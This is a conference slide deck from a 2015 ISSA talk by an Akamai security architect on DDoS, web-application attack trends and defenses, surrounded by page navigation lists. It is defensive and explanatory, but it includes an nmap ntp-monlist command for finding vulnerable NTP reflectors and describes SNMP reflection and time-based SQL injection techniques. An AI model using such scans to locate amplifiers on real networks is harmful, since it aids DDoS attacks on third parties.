Rethinking Security: Corsa Red Armor Network Security Enforcement
Rethinking Security: Corsa Red Armor Network Security EnforcementRethinking Security: Corsa Red Armor Network Security Enforcement
Rethinking Security: Corsa Red Armor Network Security Enforcement
Corsa Technology
 
Streaming Cyber Security into Graph: Accelerating Data into DataStax Graph an...
Streaming Cyber Security into Graph: Accelerating Data into DataStax Graph an...Streaming Cyber Security into Graph: Accelerating Data into DataStax Graph an...
Streaming Cyber Security into Graph: Accelerating Data into DataStax Graph an...
Keith Kraus
 
Data center webinar_v2_1
Data center webinar_v2_1Data center webinar_v2_1
Data center webinar_v2_1
Lancope, Inc.
 
NTXISSACSC4 - Layered Security / Defense in Depth
NTXISSACSC4 - Layered Security / Defense in DepthNTXISSACSC4 - Layered Security / Defense in Depth
NTXISSACSC4 - Layered Security / Defense in Depth
North Texas Chapter of the ISSA
 

Similar to NTXISSACSC3 - Cyber Warfare: Identifying Attackers Hiding Amongst the Flock by Anthony Lauro (20)

DETENIENDO LOS ATAQUES DDOS CON NSFOCUS
DETENIENDO LOS ATAQUES DDOS CON NSFOCUSDETENIENDO LOS ATAQUES DDOS CON NSFOCUS
DETENIENDO LOS ATAQUES DDOS CON NSFOCUS
 
NTXISSACSC4 - Array Networks - A Layered Approach to Web and Application Secu...
NTXISSACSC4 - Array Networks - A Layered Approach to Web and Application Secu...NTXISSACSC4 - Array Networks - A Layered Approach to Web and Application Secu...
NTXISSACSC4 - Array Networks - A Layered Approach to Web and Application Secu...
 
The 3 Models in the NGINX Microservices Reference Architecture
The 3 Models in the NGINX Microservices Reference ArchitectureThe 3 Models in the NGINX Microservices Reference Architecture
The 3 Models in the NGINX Microservices Reference Architecture
 
Microsegmentation from strategy to execution
Microsegmentation from strategy to executionMicrosegmentation from strategy to execution
Microsegmentation from strategy to execution
 
NTXISSACSC3 - Critical Criteria for (Cloud) Workload Security by Steve Armend...
NTXISSACSC3 - Critical Criteria for (Cloud) Workload Security by Steve Armend...NTXISSACSC3 - Critical Criteria for (Cloud) Workload Security by Steve Armend...
NTXISSACSC3 - Critical Criteria for (Cloud) Workload Security by Steve Armend...
 
Practical Machine Learning in Information Security
Practical Machine Learning in Information SecurityPractical Machine Learning in Information Security
Practical Machine Learning in Information Security
 
The evolving threat in the face of increased connectivity
The evolving threat in the face of increased connectivityThe evolving threat in the face of increased connectivity
The evolving threat in the face of increased connectivity
 
Rethinking Security: Corsa Red Armor Network Security Enforcement
Rethinking Security: Corsa Red Armor Network Security EnforcementRethinking Security: Corsa Red Armor Network Security Enforcement
Rethinking Security: Corsa Red Armor Network Security Enforcement
 
Ransomware-Recovery-as-a-Service
Ransomware-Recovery-as-a-ServiceRansomware-Recovery-as-a-Service
Ransomware-Recovery-as-a-Service
 
Information Security: We are all InfoSec (updated for 2018)
Information Security: We are all InfoSec (updated for 2018)Information Security: We are all InfoSec (updated for 2018)
Information Security: We are all InfoSec (updated for 2018)
 
Ntxissacsc5 blue 4-the-attack_life_cycle_erich_mueller
Ntxissacsc5 blue 4-the-attack_life_cycle_erich_muellerNtxissacsc5 blue 4-the-attack_life_cycle_erich_mueller
Ntxissacsc5 blue 4-the-attack_life_cycle_erich_mueller
 
Streaming Cyber Security into Graph: Accelerating Data into DataStax Graph an...
Streaming Cyber Security into Graph: Accelerating Data into DataStax Graph an...Streaming Cyber Security into Graph: Accelerating Data into DataStax Graph an...
Streaming Cyber Security into Graph: Accelerating Data into DataStax Graph an...
 
D3SF17- Improving Our China Clients Performance
D3SF17- Improving Our China Clients PerformanceD3SF17- Improving Our China Clients Performance
D3SF17- Improving Our China Clients Performance
 
Cisco Connect 2018 Malaysia - Secure data center-building a secure zero-trus...
Cisco Connect 2018 Malaysia - Secure data center-building a secure zero-trus...Cisco Connect 2018 Malaysia - Secure data center-building a secure zero-trus...
Cisco Connect 2018 Malaysia - Secure data center-building a secure zero-trus...
 
Cyber security fundamentals
Cyber security fundamentalsCyber security fundamentals
Cyber security fundamentals
 
Cyber Security 101
Cyber Security 101Cyber Security 101
Cyber Security 101
 
Second line of defense for cybersecurity : Blockchain
Second line of defense for cybersecurity : BlockchainSecond line of defense for cybersecurity : Blockchain
Second line of defense for cybersecurity : Blockchain
 
Data center webinar_v2_1
Data center webinar_v2_1Data center webinar_v2_1
Data center webinar_v2_1
 
21092018-C4E-What's Next for the Net? Security, Reliability, Capability, Perf...
21092018-C4E-What's Next for the Net? Security, Reliability, Capability, Perf...21092018-C4E-What's Next for the Net? Security, Reliability, Capability, Perf...
21092018-C4E-What's Next for the Net? Security, Reliability, Capability, Perf...
 
NTXISSACSC4 - Layered Security / Defense in Depth
NTXISSACSC4 - Layered Security / Defense in DepthNTXISSACSC4 - Layered Security / Defense in Depth
NTXISSACSC4 - Layered Security / Defense in Depth
 

More from North Texas Chapter of the ISSA

Ntxissacsc5 yellow 6-abusing protocols for dynamic addressing in space-jacenr...
Ntxissacsc5 yellow 6-abusing protocols for dynamic addressing in space-jacenr...Ntxissacsc5 yellow 6-abusing protocols for dynamic addressing in space-jacenr...
Ntxissacsc5 yellow 6-abusing protocols for dynamic addressing in space-jacenr...
North Texas Chapter of the ISSA
 
NTXISSACSC4 - Detecting and Catching the Bad Guys Using Deception
NTXISSACSC4 - Detecting and Catching the Bad Guys Using DeceptionNTXISSACSC4 - Detecting and Catching the Bad Guys Using Deception
NTXISSACSC4 - Detecting and Catching the Bad Guys Using Deception
North Texas Chapter of the ISSA
 
NTXISSACSC4 - Intellectual Property Protection― Cross Roads between Ethics, I...
NTXISSACSC4 - Intellectual Property Protection― Cross Roads between Ethics, I...NTXISSACSC4 - Intellectual Property Protection― Cross Roads between Ethics, I...
NTXISSACSC4 - Intellectual Property Protection― Cross Roads between Ethics, I...
North Texas Chapter of the ISSA
 

More from North Texas Chapter of the ISSA (20)

Ntxissacsc5 gold 4 beyond detection and prevension remediation
Ntxissacsc5 gold 4 beyond detection and prevension remediationNtxissacsc5 gold 4 beyond detection and prevension remediation
Ntxissacsc5 gold 4 beyond detection and prevension remediation
 
Ntxissacsc5 gold 1 mimecast e mail resiliency
Ntxissacsc5 gold 1 mimecast e mail resiliencyNtxissacsc5 gold 1 mimecast e mail resiliency
Ntxissacsc5 gold 1 mimecast e mail resiliency
 
Ntxissacsc5 yellow 6-abusing protocols for dynamic addressing in space-jacenr...
Ntxissacsc5 yellow 6-abusing protocols for dynamic addressing in space-jacenr...Ntxissacsc5 yellow 6-abusing protocols for dynamic addressing in space-jacenr...
Ntxissacsc5 yellow 6-abusing protocols for dynamic addressing in space-jacenr...
 
Ntxissacsc5 yellow 2-evidence driven infosec compliance strategy-garrettp1
Ntxissacsc5 yellow 2-evidence driven infosec compliance strategy-garrettp1Ntxissacsc5 yellow 2-evidence driven infosec compliance strategy-garrettp1
Ntxissacsc5 yellow 2-evidence driven infosec compliance strategy-garrettp1
 
Ntxissacsc5 yellow 1-beginnerslinux bill-petersen
Ntxissacsc5 yellow 1-beginnerslinux bill-petersenNtxissacsc5 yellow 1-beginnerslinux bill-petersen
Ntxissacsc5 yellow 1-beginnerslinux bill-petersen
 
Ntxissacsc5 red 6-diy-pentest-lab dustin-dykes
Ntxissacsc5 red 6-diy-pentest-lab dustin-dykesNtxissacsc5 red 6-diy-pentest-lab dustin-dykes
Ntxissacsc5 red 6-diy-pentest-lab dustin-dykes
 
Ntxissacsc5 red 1 &amp; 2 basic hacking tools ncc group
Ntxissacsc5 red 1 &amp; 2 basic hacking tools ncc groupNtxissacsc5 red 1 &amp; 2 basic hacking tools ncc group
Ntxissacsc5 red 1 &amp; 2 basic hacking tools ncc group
 
Ntxissacsc5 purple 5-insider threat-_andy_thompson
Ntxissacsc5 purple 5-insider threat-_andy_thompsonNtxissacsc5 purple 5-insider threat-_andy_thompson
Ntxissacsc5 purple 5-insider threat-_andy_thompson
 
Ntxissacsc5 purple 4-threat detection using machine learning-markszewczul
Ntxissacsc5 purple 4-threat detection using machine learning-markszewczulNtxissacsc5 purple 4-threat detection using machine learning-markszewczul
Ntxissacsc5 purple 4-threat detection using machine learning-markszewczul
 
Ntxissacsc5 purple 3-cyber insurance essentials-shawn_tuma.pptx
Ntxissacsc5 purple 3-cyber insurance essentials-shawn_tuma.pptxNtxissacsc5 purple 3-cyber insurance essentials-shawn_tuma.pptx
Ntxissacsc5 purple 3-cyber insurance essentials-shawn_tuma.pptx
 
Ntxissacsc5 purple 1-eu-gdpr_patrick_florer
Ntxissacsc5 purple 1-eu-gdpr_patrick_florerNtxissacsc5 purple 1-eu-gdpr_patrick_florer
Ntxissacsc5 purple 1-eu-gdpr_patrick_florer
 
Ntxissacsc5 blue 7-zerotrust more effective approach to security-ed higgins
Ntxissacsc5 blue 7-zerotrust more effective approach to security-ed higginsNtxissacsc5 blue 7-zerotrust more effective approach to security-ed higgins
Ntxissacsc5 blue 7-zerotrust more effective approach to security-ed higgins
 
Ntxissacsc5 blue 6-securityawareness-laurianna_callaghan
Ntxissacsc5 blue 6-securityawareness-laurianna_callaghanNtxissacsc5 blue 6-securityawareness-laurianna_callaghan
Ntxissacsc5 blue 6-securityawareness-laurianna_callaghan
 
Ntxissacsc5 blue 5-holistic approach to cybersecurity-abu_sadeq
Ntxissacsc5 blue 5-holistic approach to cybersecurity-abu_sadeqNtxissacsc5 blue 5-holistic approach to cybersecurity-abu_sadeq
Ntxissacsc5 blue 5-holistic approach to cybersecurity-abu_sadeq
 
Ntxissacsc5 blue 3-shifting from incident to continuous response bill white
Ntxissacsc5 blue 3-shifting from incident to continuous response bill whiteNtxissacsc5 blue 3-shifting from incident to continuous response bill white
Ntxissacsc5 blue 3-shifting from incident to continuous response bill white
 
Ntxissacsc5 blue 2-herding cats and security tools-harold_toomey
Ntxissacsc5 blue 2-herding cats and security tools-harold_toomeyNtxissacsc5 blue 2-herding cats and security tools-harold_toomey
Ntxissacsc5 blue 2-herding cats and security tools-harold_toomey
 
Ntxissacsc5 blue 1-nine cybersecurity habits-george_finney
Ntxissacsc5 blue 1-nine cybersecurity habits-george_finneyNtxissacsc5 blue 1-nine cybersecurity habits-george_finney
Ntxissacsc5 blue 1-nine cybersecurity habits-george_finney
 
NTXISSACSC4 - Detecting and Catching the Bad Guys Using Deception
NTXISSACSC4 - Detecting and Catching the Bad Guys Using DeceptionNTXISSACSC4 - Detecting and Catching the Bad Guys Using Deception
NTXISSACSC4 - Detecting and Catching the Bad Guys Using Deception
 
NTXISSACSC4 - Security for a New World
NTXISSACSC4 - Security for a New WorldNTXISSACSC4 - Security for a New World
NTXISSACSC4 - Security for a New World
 
NTXISSACSC4 - Intellectual Property Protection― Cross Roads between Ethics, I...
NTXISSACSC4 - Intellectual Property Protection― Cross Roads between Ethics, I...NTXISSACSC4 - Intellectual Property Protection― Cross Roads between Ethics, I...
NTXISSACSC4 - Intellectual Property Protection― Cross Roads between Ethics, I...
 

Recently uploaded

TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
Igalia
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
Principled Technologies
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
UK Journal
 

Recently uploaded (20)

TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
HTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation StrategiesHTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation Strategies
 
Manulife - Insurer Innovation Award 2024
Manulife - Insurer Innovation Award 2024Manulife - Insurer Innovation Award 2024
Manulife - Insurer Innovation Award 2024
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 

NTXISSACSC3 - Cyber Warfare: Identifying Attackers Hiding Amongst the Flock by Anthony Lauro

  • 1. @NTXISSA #NTXISSACSC3 Cyber Warfare: Identifying Attackers Hiding Amongst the Flock Anthony Lauro Sr. Enterprise Security Architect Akamai Technologies, Inc October 3rd, 2015
  • 2. @NTXISSA #NTXISSACSC3 Who am I? (unphilosophically speaking) About me: • Anthony Lauro | CISSP, GWAPT • Sr. Enterprise Security Architect Akamai Technologies, Inc • 16 years Information Security Experience • Advise Akamai clients on Cybersecurity Resilience • Lead Application Security training for Enterprise Security Architecture team @Akamai • Attended CCCC a long, long time ago…
  • 3. @NTXISSA #NTXISSACSC3 There are no rules of architecture for castles in the clouds. -Gilbert K. Chesterton
  • 4. @NTXISSA #NTXISSACSC3 There are no rules of architecture for castles in the clouds. -Gilbert K. Chesterton
  • 6. @NTXISSA #NTXISSACSC3 Evolving Attack Campaigns 190 Gbps attack against US financial institution Q1 13 Q2 13 Account Checker (eCommerce) Largest DNS reflection attack, 167 Gbps (Financial Services) Operation Ababil QQ3 13 Q4 13 D (R 209 EME Record number of DDoS attacks in Q3 13 17
  • 7. @NTXISSA #NTXISSACSC3 Top 10 Target Countries for Web Application Attacks Q1 2015
  • 8. @NTXISSA #NTXISSACSC3 Top 10 Source Countries for Web Application Attacks Q1 2015
  • 9. @NTXISSA #NTXISSACSC3 Attacks Grow Because Methods Improve • Traditional DDoS attacks used compromised home computers • ‘Cloud’ based DDoS attacks harness the scale of global botnets • Amplification attacks target protocol vulns to amplify size • SNMP (6.3x) • DNS (28x-54x) • CharGEN (358.8x) • NTP (556.9x) Gbps Mpps 2014e 2013 20122011 2010 2009 2008 20072006 2005 11 2 18 8 22 11 39 15 48 29 68 38 79 45 82 69 144 320 270 160
  • 10. @NTXISSA #NTXISSACSC3 You Don’t Have to Be Elite Anymore: “You can do it, we can help”!
  • 11. @NTXISSA #NTXISSACSC3 Infrastructure Attacks: Smoke Screen? 27% 24% 8% 4% 30% 5%
  • 12. @NTXISSA #NTXISSACSC3 WHAT MOTIVATES THE THREAT ACTOR? Hacked Web Server
  • 14. @NTXISSA #NTXISSACSC3 There Are No Immunities Between Verticals Source: www.informationisbeautiful.net/
  • 15. @NTXISSA #NTXISSACSC3 2014 Attack Trends • Top three attack vectors are application layer attacks • Defacement leads as the top attack, followed by SQLi and Account Hijacking as the most prevalent attacks seen in 2014 Source: Stateoftheinternet.com
  • 16. @NTXISSA #NTXISSACSC3 Login Abuse: Account Checker Attacks The fuel for any account checker is a list of credentials. Fortunately for attackers, there are a huge number of credentials that are public. • 38,000,000 Adobe accounts • 318,000 Facebook accounts • 70,000 Google accounts • 60,000 Yahoo accounts • 22,000 Twitter accounts • 8,000 ADP accounts • 8,000 LinkedIn accounts
  • 18. @NTXISSA #NTXISSACSC3 A Castle Built in 1385 Defense against French: 100yr War
  • 19. @NTXISSA #NTXISSACSC3 • Acts as a gateway • Defensive resources become limited • Entry and Exits cannot coexist
  • 21. @NTXISSA #NTXISSACSC3 Common Approaches to Web Security Build It Buy BoxesDeny the problem
  • 23. @NTXISSA #NTXISSACSC3 Approaches for Web Security On-Premise Hardware Router Firewall Load balancer Bandwidth Application Protection Cloud Service Cloud Platform ISPs Internet Service Providers
  • 24. @NTXISSA #NTXISSACSC3 On-Premises Web Security Approach On-Premise Hardware Router Firewall Load balancer Bandwidth Bandwidth Constraint Connection & Processing Limitations Application Vulnerability Exploitation “Have to ingest ALL traffic before a Yes/No decision can be made” Performance Degradation Throughput of devices cannot meet volume / requests per second of good and bad traffic spikes. Reliability WAF configurations are complex often not tuned properly or not in blocking mode. Accuracy
  • 25. @NTXISSA #NTXISSACSC3 I put the WAF on a SPAN port. I was afraid of blocking legitimate traffic! How did this breach occur, we have a WAF!!
  • 26. @NTXISSA #NTXISSACSC3 Internet Service Provider Approach ISPs Internet Service Providers DDoS Only Protection False Positives/ Upstream Blacklisting Single-Homed Protection Carrier Dependent Architecture Capacity Issues At Scale
  • 28. @NTXISSA #NTXISSACSC3 Application Protection Cloud Service Approach Application Protection Cloud Service Cloud Platform Direct-to-Origin DDoS Protection Gap Shared Infrastructure (Capacity Constraints) Acceptable Use Monitoring Challenge Retaining Real-time Visibility Not Always Enterprise Class Protection
  • 29. @NTXISSA #NTXISSACSC3 “In other words, careful where you aim that gun, #OpISIS, because it might point back at you as well.” -Mike Masnick TechDirt
  • 33. @NTXISSA #NTXISSACSC3 For Internet-facing Applications Internet Web Retrieval and integrity of content and data Origin Supporting infrastructure and other applications DNS Finding the application Datacenter User
  • 34. @NTXISSA #NTXISSACSC3 Multiple Perimeters For Internet-facing Applications Volumetric Protection • Massive resiliency • Thousands of points of presence • Distributed geographically • Rate controls for noisy requestors Attacks Against CNAMEs • Network and application layer filtering capable • Protocol validation/Filtering • SSL decrypt – re-encrypt • Geo Sensing and Filtering Capable • Capacity: Throughput & P/ps Attacks Against Datacenter IP’s • Direct to origin protection using BGP redirection • Multiple globally distributed scrubbing centers • Attack capacity to withstand multiple attacks at once • Good traffic bypass as not to degrade performance
  • 35. @NTXISSA #NTXISSACSC3 Multiple Perimeters For Internet-facing Applications Application Layer Attacks SSL decryption at scale Risk scoring rule sets Tune accuracy over time Attacks Against DNS Rate Controls - Connection Throttling White Listing Application Inspection DNSSEC Client/Server Locks Anycast Responses Event Visibility Threat intel gathered and validated against global dataset Real-Time event correlation between security policies Ability to identify hosts based on previous malicious behavior Import log feed from ‘cloud’ into internal SIEM for correlation
  • 36. @NTXISSA #NTXISSACSC3 HOW TO YOU IDENTIFY & CLASSIFY
  • 37. @NTXISSA #NTXISSACSC3 THERE’S A DIFFERENCE BETWEEN VISIBILITY & INSIGHT
  • 38. @NTXISSA #NTXISSACSC3 • Use behavioral data to protect your castle •Collect and correlate attack traffic into a large dataset from across the web •Identify bad clients based on past behavior •Define a risk score for malicious clients •Filter malicious client based on risk score CLIENT REPUTATION SCORING
  • 39. @NTXISSA #NTXISSACSC3 Information Intelligence Raw, unfiltered feed Processes, sorted information Aggregated from virtually every source Aggregated from reliable sources and cross correlated for accuracy May be true, false, misleading, incomplete, relevant or irrelevant Accurate, timely, complete, assessed for relevancy Not actionable Actionable InfoSec teams are swimming in data More raw “information” is not the solution
  • 40. @NTXISSA #NTXISSACSC3 53 11,008 16,135 21,359 15,071 30,427 69,226 124,625 9/24 9/25 9/26 9/27 9/28 9/29 9/30 10/1 Unique Shellshock payloads Threats Change/Advance Over Time Shellshock disclosed
  • 42. @NTXISSA #NTXISSACSC3 Case Study: 320 Gbps DDoS Attack: Gaming Vertical, APAC Region • Largest attack ever mitigated by Akamai against single customer • Targeted primary website, supporting network infrastructure, and DNS • Multiple attack vectors: • SYN/UDP floods - entire subnet • Volumetric attack against DNS • Attack characteristics: • 320 Gbps and 71.5 Mpps peak traffic • 2.1 million requests/s against DNS
  • 43. @NTXISSA #NTXISSACSC3 138 232 321 155 177 312 4 198 217 30 8 35 33 70 3 2 1.5 One Attack in a Broader DDoS Attack Campaign Start End Infrastructure (Gbps) authDNS (Mpps) DNS Reflection (Mpps)Web (Gbps) 21 + Day campaign against single customer • 39 distinct attacks targeting applications and DNS infrastructure • Eight attacks >100 Gbps including record 320 Gbps attack
  • 44. @NTXISSA #NTXISSACSC3 Grow revenue opportunities with fast, personalized web experiences and manage complexity from peak demand, mobile devices and data collection. Opening Ceremony 1st day of sports • 132 BILLION requests processed by our WAFs • 10x more than 2010 Winter Olympics • WAF rules triggered • 127x more than 2010 Winter Olympics • Custom Rules Triggered: 166,000,000 • Rate Controls (Adaptive Rules) Triggered: 5,600,000 • Requests Denied: 182,200,000
  • 45. @NTXISSA #NTXISSACSC3 Grow revenue opportunities with fast, personalized web experiences and manage complexity from peak demand, mobile devices and data collection. 0 100 200 300 400 500 Attack traffic… 0 50000 100000 150000 200000 250000 300000 Spain to Netherlands 0 100 200 300 400 500 600 -500 500 1500 2500 3500 4500 Chile to… Australia… 0 2000 4000 6000 8000 10000 12000 14000 16000 Ivory Coast to Japan 3-1 1-5 1-2 3-1 Opening ceremony
  • 46. @NTXISSA #NTXISSACSC3 Avoid data theft and downtime by extending the security perimeter outside the data-center and protect from increasing frequency, scale and sophistication of web attacks. Web Application Attacks by Industry – Q1 2015
  • 47. @NTXISSA #NTXISSACSC3 • Reflection attack • Mostly SNMP v2c devices (~3+ years old) with default “public” community string • Routers, printers, cable modems, NAS • New tool automates sending getBulkRequest to open SNMP servers. • Flood of SNMP GetResponse data sent from reflectors to victim on port 80 • SNMP query begins at highest (OID) tree level to obtain largest possible response The Attack du jour?
  • 49. @NTXISSA #NTXISSACSC3 Avoid data theft and downtime by extending the security perimeter outside the data-center and protect from increasing frequency, scale and sophistication of web attacks. Case Study: NTP Attacks on Origin 500X RETURN RATE INTRAFFIC >100GBPS ATTACK TRAFFIC AGAINST ORIGIN 1,000+ INCREASE INHITS PER SECOND AGAINST ORIGIN AttackVector Requestwith spoofedsourceIP of target serversentto a vulnerableNTP serverthat allowsthemonlistfunction. NTP serverrepliesbackto the targetIP, direct to origin,at massivescale.
  • 50. @NTXISSA #NTXISSACSC3 Use nmap NSE Script: identify vulnerable hosts Example: nmap -sU -pU:123 -Pn -n --script=ntp-monlist <target> • The monitor list in response to the monlist command is limited to 600 associations. • The monitor capability may not be enabled on the target in which case you may receive an error number 4 (No Data Available). • There may be a restriction on who can perform Mode 7 commands (e.g. "restrict noquery" in ntp.conf) in which case you may not receive a reply. • This script does not handle authenticating and targets expecting auth info may respond with error number 3 (Format Error).
  • 51. @NTXISSA #NTXISSACSC3 SSDP aka uPnP (Universal Plug and Pray) SSDP 200-OK Response
  • 52. @NTXISSA #NTXISSACSC3 DNS Attack Targeting Akamai Customer • DNS requests peaked at 168k per second. • 19B hits in 5 days. Normally serve ~30M hits per week.
  • 53. @NTXISSA #NTXISSACSC3 DNS Hijacks Attacks: Common Tactic for Middle Eastern Attackers • Client DNS Locks • clientUpdateProhibited • clientTransferProhibited • clientDeleteProhibited • Registrar locks • serverUpdateProhibited • serverTransferProhibited • serverDeleteProhibited US DoD’s DNS Hijacked Best Practice DNS Locks
  • 54. @NTXISSA #NTXISSACSC3 RFI Attempt to pull click.php file from remote location Using RFI vuln in TimThumb Plugin Remote File Inclusion
  • 55. @NTXISSA #NTXISSACSC3 Here’s what click.php is really about! HTTP(s) Redirections can fluctuate between 14-20 different pay4click companies and advertiser’s and that means precious bitcoin revenue for the attacker and his friends. http://www.secureworks.com/cyber-threat-intelligence/threats/ppc-hijack/
  • 56. @NTXISSA #NTXISSACSC3 When good things go bad: Rogue Reseller to Competitor “After years of this relationship we recently found that they now have a copycat site and are selling our products that they are now manufacturing on their own.” – Enterprise Manufacturing Customer “At first they were just scraping our site and we saw it to be mutually beneficial…”
  • 57. @NTXISSA #NTXISSACSC3 Blind SQL Injection: Time Based Attack This type of blind SQL injection relies on the database pausing for a specified amount of time and examining the results. Using this method, an attacker enumerates each letter of the desired piece of data. Client Request
  • 58. @NTXISSA #NTXISSACSC3 SQL Injection Analysis 2000 customers over one week SQL Injection Attacks % HTTP 8,137,681 96.6 HTTPS 287,808 3.4 Total 8,425,489 100 Protocol Breakdown Breakdown by Intent Source: Akamai CSI
  • 60. @NTXISSA #NTXISSACSC3 Remote File Inclusion Attack Request Client Info
  • 62. @NTXISSA #NTXISSACSC3 ACCOUNT CHECKERS: CARDERS Several techniques are used to avoid detection and mitigation, including: ● Randomization of UserAgent header ● Targeting of alternative (mobile/API/legacy) login pages, which may have weaker mitigation controls and are often overlooked by the customer. ● Attacks originate from highly distributed set of IP addresses, with different source countries. ● Use of low request rates to evade rate controls. ● Change in order of headers. ● Changes in tactics when 403 responses are received.
  • 63. @NTXISSA #NTXISSACSC3 Fraud – Vietnamese Carders Carder TTP • Build Tools Server • Cultivate List of Open Proxies • Acquire Compromised Logins • Check/Alter Compromised Accounts • Make Fraudulent Purchases • Cash out/Resell gift cards
  • 64. @NTXISSA #NTXISSACSC3 Login Abuse: THE STRUGGLE IS REAL You know who you are!
  • 65. @NTXISSA #NTXISSACSC3 Login Abuses: TTPs and Defenses Rate controls to block fast moving scripts • Attack relies on being able to check thousands of accounts quickly • Blocking aggressive scripts prevents login exploitation Internal monitoring for changes to customer accounts • Email address • Shipping address • Same email on multiple accounts Geo blocklists for areas where there is no business • Cuts down on the places attackers can launch from • Do cloud server providers need to access your webpage? Custom rules to block User-Agent strings (or lack thereof) • Attack scripts are often simple and will contain only “curl” or “wget” • Sometimes none at all
  • 68. @NTXISSA #NTXISSACSC3 DD4BC: (DDoS for Bitcoin) • Industries affected • Payment Processing • Banking & Credit Unions • Gambling • Oil & Gas • E-Commerce • High Tech Consulting/Services • Attack Types • Boot Stressor sites most likely culprit • Reflection Attacks
  • 69. @NTXISSA #NTXISSACSC3 Looking Forward into 2015 • Industry Verticals • Gaming, Fiserv, Internet & Telecom, Software & Tech, and Media verticals expected to be targeted heavily in 2015 • Security vulnerabilities continue to increase due to bespoke/custom applications • Good history of successful attacks • DDoS Attacks • Expect more ‘mega’ attacks > 100Gbps • Commoditization of DDOS attacks • IPv6 uptake to increase DDoS vector • Never pay ransoms, but do have a plan • APPLICATION ATTACK TRENDS • APPSEC IS FAILING – NEED HELP! • IF YOU DON’T HAVE AN APPSEC PROGRAM START ONE! • INJECTION & XSS RIDE OWASP TOP 10 • SESSIONS MGMT – YOURE DOING IT WRONG • DEVELOPERS – YOU’RE BEHIND!
  • 70. @NTXISSA #NTXISSACSC3 1. You Need ’Validated’ Data To derive intelligence on current & evolving threats. 2. Scale, Availability & Resilience To be high performing, take the punches, & stay online. 3. A Plan To understand how to respond to bad day scenarios. 4. Control & Flexibility To adapt your defenses dynamically. Cyber Security Requirements: 5 Points To Take Away 5. People & Experience To execute every time you come under attack.
